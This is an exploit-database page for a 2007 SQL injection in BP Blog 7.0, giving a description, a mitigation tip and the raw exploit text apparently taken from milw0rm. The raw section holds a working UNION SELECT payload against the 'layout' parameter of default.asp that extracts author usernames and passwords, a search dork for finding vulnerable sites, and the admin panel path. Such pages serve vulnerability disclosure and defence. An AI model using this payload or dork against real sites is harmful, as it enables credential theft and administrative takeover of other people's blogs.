header-logo
Suggest Exploit
vendor:
BP Blog
by:
BeyazKurt
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: BP Blog
Affected Version From: BP Blog 7.0
Affected Version To: BP Blog 7.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

BP Blog Exploit

The BP Blog 7.0 script is vulnerable to SQL injection. By manipulating the 'layout' parameter in the default.asp file, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database, such as the author's username and password.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#####################################
# BeyazKurt <B3yazKurt@Hotmail.Com>
# Script : BP Blog
# D0rk   : "Powered by BP Blog 7.0"
# thnx   : Forever.slam and all WorldHackerz Team!
#
# WorldHackerz Mirr0r'da Taht Bizimdir (h) :=)
#####################################
-------
Exploit :
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp

# milw0rm.com [2007-03-12]

Navigation

Suggest Exploit

Services By CQR